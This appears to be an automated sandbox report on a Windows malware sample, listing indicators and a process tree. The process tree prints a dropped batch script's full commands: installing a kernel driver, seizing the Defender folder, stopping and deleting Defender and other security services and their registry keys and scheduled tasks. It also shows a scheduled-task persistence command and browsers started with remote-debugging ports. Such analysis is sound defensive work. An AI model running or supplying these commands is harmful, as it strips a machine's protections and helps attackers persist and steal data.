pid Process 2460 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 2460 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 1972 rapes.exe 1972 rapes.exe 4236 MSBuild.exe 4236 MSBuild.exe 4236 MSBuild.exe 4236 MSBuild.exe 2200 132a2d7f4d.exe 2200 132a2d7f4d.exe 2200 132a2d7f4d.exe 2200 132a2d7f4d.exe 2200 132a2d7f4d.exe 2200 132a2d7f4d.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 2060 chrome.exe 2060 chrome.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 5024 03f1ade1d9.exe 5024 03f1ade1d9.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 5024 03f1ade1d9.exe 5024 03f1ade1d9.exe 5024 03f1ade1d9.exe 3008 9a02d1b43e.exe 3008 9a02d1b43e.exe 3008 9a02d1b43e.exe 3008 9a02d1b43e.exe 3008 9a02d1b43e.exe 3008 9a02d1b43e.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 6184 MSBuild.exe 6184 MSBuild.exe 6184 MSBuild.exe 6184 MSBuild.exe 4696 rapes.exe 4696 rapes.exe 1048 1b9f07e8f6.exe 1048 1b9f07e8f6.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 656 Process not Found 656 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3948 7b35p_003.exe 3948 7b35p_003.exe 3948 7b35p_003.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 5956 msedge.exe 5956 msedge.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1044 FjbTOQC.exe Token: SeShutdownPrivilege 2060 chrome.exe Token: SeCreatePagefilePrivilege 2060 chrome.exe Token: SeShutdownPrivilege 2060 chrome.exe Token: SeCreatePagefilePrivilege 2060 chrome.exe Token: SeDebugPrivilege 2224 taskkill.exe Token: SeShutdownPrivilege 2060 chrome.exe Token: SeCreatePagefilePrivilege 2060 chrome.exe Token: SeShutdownPrivilege 2060 chrome.exe Token: SeCreatePagefilePrivilege 2060 chrome.exe Token: SeDebugPrivilege 3496 taskkill.exe Token: SeDebugPrivilege 2936 taskkill.exe Token: SeDebugPrivilege 3932 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 2492 firefox.exe Token: SeDebugPrivilege 2492 firefox.exe Token: SeDebugPrivilege 5024 03f1ade1d9.exe Token: SeDebugPrivilege 4916 MsWin32tart.exe Token: SeDebugPrivilege 2468 powershell.exe -
Suspicious use of FindShellTrayWindow 56 IoCs
pid Process 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 2060 chrome.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 2492 firefox.exe 672 144409b916.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 672 144409b916.exe 2492 firefox.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 5956 msedge.exe -
Suspicious use of SendNotifyMessage 23 IoCs
pid Process 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe 672 144409b916.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2492 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2460 wrote to memory of 1972 2460 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 90 PID 2460 wrote to memory of 1972 2460 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 90 PID 2460 wrote to memory of 1972 2460 bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe 90 PID 1972 wrote to memory of 900 1972 rapes.exe 96 PID 1972 wrote to memory of 900 1972 rapes.exe 96 PID 1972 wrote to memory of 900 1972 rapes.exe 96 PID 900 wrote to memory of 3668 900 apple.exe 97 PID 900 wrote to memory of 3668 900 apple.exe 97 PID 900 wrote to memory of 3668 900 apple.exe 97 PID 3668 wrote to memory of 5824 3668 22.exe 99 PID 3668 wrote to memory of 5824 3668 22.exe 99 PID 5824 wrote to memory of 3696 5824 cmd.exe 101 PID 5824 wrote to memory of 3696 5824 cmd.exe 101 PID 5824 wrote to memory of 3696 5824 cmd.exe 101 PID 3696 wrote to memory of 1212 3696 22.exe 102 PID 3696 wrote to memory of 1212 3696 22.exe 102 PID 1212 wrote to memory of 400 1212 cmd.exe 104 PID 1212 wrote to memory of 400 1212 cmd.exe 104 PID 1212 wrote to memory of 3020 1212 cmd.exe 105 PID 1212 wrote to memory of 3020 1212 cmd.exe 105 PID 1212 wrote to memory of 5192 1212 cmd.exe 106 PID 1212 wrote to memory of 5192 1212 cmd.exe 106 PID 1212 wrote to memory of 5652 1212 cmd.exe 107 PID 1212 wrote to memory of 5652 1212 cmd.exe 107 PID 1212 wrote to memory of 5884 1212 cmd.exe 108 PID 1212 wrote to memory of 5884 1212 cmd.exe 108 PID 1212 wrote to memory of 840 1212 cmd.exe 109 PID 1212 wrote to memory of 840 1212 cmd.exe 109 PID 1212 wrote to memory of 464 1212 cmd.exe 110 PID 1212 wrote to memory of 464 1212 cmd.exe 110 PID 1212 wrote to memory of 5104 1212 cmd.exe 111 PID 1212 wrote to memory of 5104 1212 cmd.exe 111 PID 1212 wrote to memory of 4956 1212 cmd.exe 112 PID 1212 wrote to memory of 4956 1212 cmd.exe 112 PID 1212 wrote to memory of 5464 1212 cmd.exe 113 PID 1212 wrote to memory of 5464 1212 cmd.exe 113 PID 1212 wrote to memory of 2276 1212 cmd.exe 114 PID 1212 wrote to memory of 2276 1212 cmd.exe 114 PID 1212 wrote to memory of 1608 1212 cmd.exe 115 PID 1212 wrote to memory of 1608 1212 cmd.exe 115 PID 1212 wrote to memory of 1960 1212 cmd.exe 116 PID 1212 wrote to memory of 1960 1212 cmd.exe 116 PID 1212 wrote to memory of 1816 1212 cmd.exe 117 PID 1212 wrote to memory of 1816 1212 cmd.exe 117 PID 1212 wrote to memory of 2648 1212 cmd.exe 118 PID 1212 wrote to memory of 2648 1212 cmd.exe 118 PID 1212 wrote to memory of 5448 1212 cmd.exe 119 PID 1212 wrote to memory of 5448 1212 cmd.exe 119 PID 1212 wrote to memory of 4980 1212 cmd.exe 120 PID 1212 wrote to memory of 4980 1212 cmd.exe 120 PID 1212 wrote to memory of 1468 1212 cmd.exe 121 PID 1212 wrote to memory of 1468 1212 cmd.exe 121 PID 1212 wrote to memory of 3560 1212 cmd.exe 122 PID 1212 wrote to memory of 3560 1212 cmd.exe 122 PID 1212 wrote to memory of 5376 1212 cmd.exe 123 PID 1212 wrote to memory of 5376 1212 cmd.exe 123 PID 1212 wrote to memory of 3256 1212 cmd.exe 124 PID 1212 wrote to memory of 3256 1212 cmd.exe 124 PID 1212 wrote to memory of 736 1212 cmd.exe 125 PID 1212 wrote to memory of 736 1212 cmd.exe 125 PID 1212 wrote to memory of 3404 1212 cmd.exe 126 PID 1212 wrote to memory of 3404 1212 cmd.exe 126 PID 1212 wrote to memory of 3660 1212 cmd.exe 128 PID 1212 wrote to memory of 3660 1212 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe"C:\Users\Admin\AppData\Local\Temp\bc1f7ca5b344ac935361475d3a386ca9c17ae5b856e1028622d2a7131d6eb666.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91D0.tmp\91D1.tmp\91D2.bat C:\Users\Admin\AppData\Local\Temp\22.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:5824 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9308.tmp\9309.tmp\930A.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:400
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:3020
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:5192
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:5652
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:5884
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:840
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:464
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:5104
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:4956
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:5464
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:2276
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:1608
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:1960
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:5448
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:4980
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:3560
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:5376
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:3256
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:736
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:3404
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:2436
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:5216
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:5248
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:1284
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:1008
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:5068
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:1764
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:1504
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:2696
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:3232
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:5444
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:264
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:1132
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:2500
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:3276
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:3616
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:5916
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:5892
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:3388
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:3772
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:624
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:916
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:3252
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:2496
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:1336
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:1228
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:3684
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:2056
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:4976
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:5540
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:1260
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:6068
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:6044
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:5816
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:456
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1824 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4236
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:1044 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MsWin32tart" /tr "C:\Users\Admin\AppData\Roaming\MsWin32tart.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2288
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346890101\132a2d7f4d.exe"C:\Users\Admin\AppData\Local\Temp\10346890101\132a2d7f4d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\10346900101\1b9f07e8f6.exe"C:\Users\Admin\AppData\Local\Temp\10346900101\1b9f07e8f6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1048 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2060 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa7d68dcf8,0x7ffa7d68dd04,0x7ffa7d68dd105⤵PID:5020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1728,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1724 /prefetch:25⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1484,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:35⤵PID:4988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2348,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1900 /prefetch:85⤵PID:5700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3252 /prefetch:15⤵
- Uses browser remote debugging
PID:3276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3288 /prefetch:15⤵
- Uses browser remote debugging
PID:3588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4288 /prefetch:25⤵
- Uses browser remote debugging
PID:1680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4612 /prefetch:15⤵
- Uses browser remote debugging
PID:1052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5292,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5300 /prefetch:85⤵PID:5796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5484,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5496 /prefetch:85⤵PID:3040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5628 /prefetch:85⤵PID:2500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5732,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5420 /prefetch:85⤵PID:5956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5280,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5720 /prefetch:85⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5276,i,7135530613799408395,6060445635774223405,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5740 /prefetch:85⤵PID:2344
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5956 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x250,0x7ffa7d32f208,0x7ffa7d32f214,0x7ffa7d32f2205⤵PID:3584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2184,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:35⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2084,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:25⤵PID:5784
-
-
